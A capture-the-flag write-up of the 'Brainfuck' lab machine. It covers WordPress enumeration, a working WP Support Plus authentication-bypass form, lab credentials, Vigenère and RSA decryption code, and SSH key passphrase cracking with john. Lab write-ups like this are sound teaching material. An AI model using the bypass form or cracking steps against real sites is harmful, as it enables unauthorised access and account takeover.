Brainfuck

Posted on 22 February 2020


Port scan with zenmap

Add brainfuck.htb to /etc/hosts:
gedit /etc/hosts

Visit port 443 in the browser

Scan with wpscan

wpscan --url https://brainfuck.htb --disable-tls-checks --enumerate p,t,u --plugins-detection aggressive --api-token <api-token>

With newer wpscan versions the command above only checks 1500 plugins; running the plugin scan on its own covers all of them:

wpscan --url https://brainfuck.htb --disable-tls-checks --plugins-detection aggressive --api-token <api-token>

Google: WP Support Plus exploit

wpscan enumerated the username, and the home page shows an e-mail address.

exploit-db/41006
Save the following form as exp.html (gedit exp.html):

<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
    Username: <input type="text" name="username" value="admin">
    <input type="hidden" name="email" value="orestis@brainfuck.htb">
    <input type="hidden" name="action" value="loginGuestFacebook">
    <input type="submit" value="Login">
</form>

Start a Python HTTP server to serve exp.html:
python -m SimpleHTTPServer 80

After clicking Login and revisiting the home page, we are logged in with administrator privileges.

Visit https://brainfuck.htb/wp-admin/ and open Plugins.

SMTP credentials:
Username: orestis
Password: kHGuERB29DNiNE

Connect to POP3 and log in with those credentials:
nc 10.10.10.17 110
retr 1 contains nothing useful
retr 2 gives a username and password:
username: orestis
password: kIEnnfEKJ#9UmdO

Remembered that https://sup3rs3cr3t.brainfuck.htb had not been visited yet.
Logging in there with
username: orestis
password: kIEnnfEKJ#9UmdO
succeeds.

Going through each conversation reveals two pieces of text:

Mya qutf de buj otv rms dy srd vkdof :)
Pieagnm - Jkoijeg nbw zwx mle grwsnn

I am opening up an encrypted thread. Talk to you there!
Orestis - Hacking for fun and profit

Decrypt with an online decryption tool (the cipher is a Vigenère):

After decrypting, remove the surplus characters:
BrainfuCkmybrainfuckmybrainfu

The thread also contains:

Ybgbq wpl gw lto udgnju fcpp, C jybc zfu zrryolqp zfuz xjs rkeqxfrl ojwceec J uovg :)
mnvze://10.10.10.17/8zb5ra10m915218697q1h658wfoq0zc8/frmfycu/sp_ptr

Based on the characters decrypted earlier, guess that the key is fuckmybrain

Decrypted:
https://10.10.10.17/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa
Visit the URL and download the key
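As an added example (not part of the original writeup, which used an online tool), the two steps above in Python: recovering the key stream from the known signature plaintext "Orestis - Hacking for fun and profit" against its ciphertext, finding its shortest repeating period, and decrypting the URL line with the key guessed above. The cipher and plaintext strings are the ones quoted from the forum; the function names are my own.

```python
import string

# Added example, not code from the original writeup. The strings below are
# the forum texts quoted in the writeup; KEY is the author's guess.
ALPHABET = string.ascii_lowercase

SIGNATURE_PLAIN = "Orestis - Hacking for fun and profit"
SIGNATURE_CIPHER = "Pieagnm - Jkoijeg nbw zwx mle grwsnn"
URL_CIPHER = "mnvze://10.10.10.17/8zb5ra10m915218697q1h658wfoq0zc8/frmfycu/sp_ptr"
KEY = "fuckmybrain"


def vigenere_decrypt(ciphertext: str, key: str) -> str:
    """Classic Vigenère: only letters are shifted, case is preserved, and
    digits/punctuation pass through without consuming a key letter. That
    last rule is why the dots and digits in the URL survive unchanged."""
    key = key.lower()
    out, k = [], 0
    for ch in ciphertext:
        if ch.isalpha():
            shift = ALPHABET.index(key[k % len(key)])
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base - shift) % 26 + base))
            k += 1
        else:
            out.append(ch)
    return "".join(out)


def recover_keystream(plaintext: str, ciphertext: str) -> str:
    """Known-plaintext attack: each key letter is (cipher - plain) mod 26.
    Non-letters are skipped on both sides, matching the cipher's rule."""
    stream = []
    for p, c in zip(plaintext, ciphertext):
        if p.isalpha() and c.isalpha():
            stream.append(ALPHABET[(ALPHABET.index(c.lower()) - ALPHABET.index(p.lower())) % 26])
    return "".join(stream)


def shortest_period(keystream: str) -> str:
    """Smallest prefix whose repetition reproduces the whole key stream;
    this is the key up to rotation (the unknown starting phase)."""
    for n in range(1, len(keystream) + 1):
        if all(keystream[i] == keystream[i % n] for i in range(len(keystream))):
            return keystream[:n]
    return keystream


if __name__ == "__main__":
    stream = recover_keystream(SIGNATURE_PLAIN, SIGNATURE_CIPHER)
    print("key stream:", stream)
    print("period    :", shortest_period(stream))
    print("url       :", vigenere_decrypt(URL_CIPHER, KEY))
```

The recovered stream is the "BrainfuCkmybrainfuckmybrainfu" the online tool printed, with a period of 11 letters; "brainfuckmy" is a rotation of "fuckmybrain", which is why the phrase is the natural guess and decrypts the URL post from its first letter.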

The key requires a passphrase.

Cracking it with john gives the passphrase: 3poulakia!

locate ssh2john
cp /usr/share/john/ssh2john.py .
python ssh2john.py id_rsa > ssh_login
john ssh_login --wordlist=/usr/share/wordlists/rockyou.txt

Change the permissions on id_rsa (chmod 600) and connect over SSH:

ssh -i id_rsa orestis@10.10.10.17

The home directory contains encrypt.sage, output.txt and debug.txt:

orestis@brainfuck:~$ cat encrypt.sage
nbits = 1024

password = open("/root/root.txt").read().strip()
enc_pass = open("output.txt","w")
debug = open("debug.txt","w")
m = Integer(int(password.encode('hex'),16))

p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
q = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
n = p*q
phi = (p-1)*(q-1)
e = ZZ.random_element(phi)
while gcd(e, phi) != 1:
    e = ZZ.random_element(phi)

c = pow(m, e, n)
enc_pass.write('Encrypted Password: '+str(c)+'\n')
debug.write(str(p)+'\n')
debug.write(str(q)+'\n')
debug.write(str(e)+'\n')
orestis@brainfuck:~$ cat output.txt
Encrypted Password: 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182
orestis@brainfuck:~$ cat debug.txt
7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997

Found a decryption script online; set p, q and e from lines 1-3 of debug.txt and ct from output.txt, and save it as rsa_egcd.py:

http://dann.com.br/alexctf2k17-crypto150-what_is_this_encryption/
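As an added example (not the original writeup's script nor the one linked above), the same decryption in plain Python. Because debug.txt leaks p, q and e, phi = (p-1)(q-1) and d = e^-1 mod phi follow immediately, and m = c^d mod n undoes the pow(m, e, n) in encrypt.sage; the textbook RSA here is only as secret as the file that holds the primes. The constants are the values printed from debug.txt and output.txt above; the function names are my own. Needs Python 3.8+ for pow(e, -1, phi).

```python
# Added example, not code from the original writeup. P, Q, E are the three
# lines of debug.txt and C is the number in output.txt, as shown above.
P = 7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
Q = 7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
E = 30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
C = 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182


def rsa_private_exponent(p: int, q: int, e: int) -> int:
    """d = e^-1 mod (p-1)(q-1). encrypt.sage guarantees gcd(e, phi) == 1,
    so the inverse exists; pow raises ValueError otherwise."""
    phi = (p - 1) * (q - 1)
    return pow(e, -1, phi)


def rsa_decrypt_int(c: int, p: int, q: int, e: int) -> int:
    """m = c^d mod n, the inverse of c = pow(m, e, n) in the Sage script."""
    d = rsa_private_exponent(p, q, e)
    return pow(c, d, p * q)


def int_to_bytes(m: int) -> bytes:
    """Undo m = int(password.encode('hex'), 16): big-endian bytes of m."""
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


def recover_root_flag() -> bytes:
    """Plaintext of output.txt given the leaked private parameters."""
    return int_to_bytes(rsa_decrypt_int(C, P, Q, E))


if __name__ == "__main__":
    print(recover_root_flag().decode("ascii", errors="replace"))
```

The check that matters when reusing this on other data is the round trip: re-encrypting the recovered m with e must give back c, which holds exactly when p and q are the true factors of n.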

Get the flag.
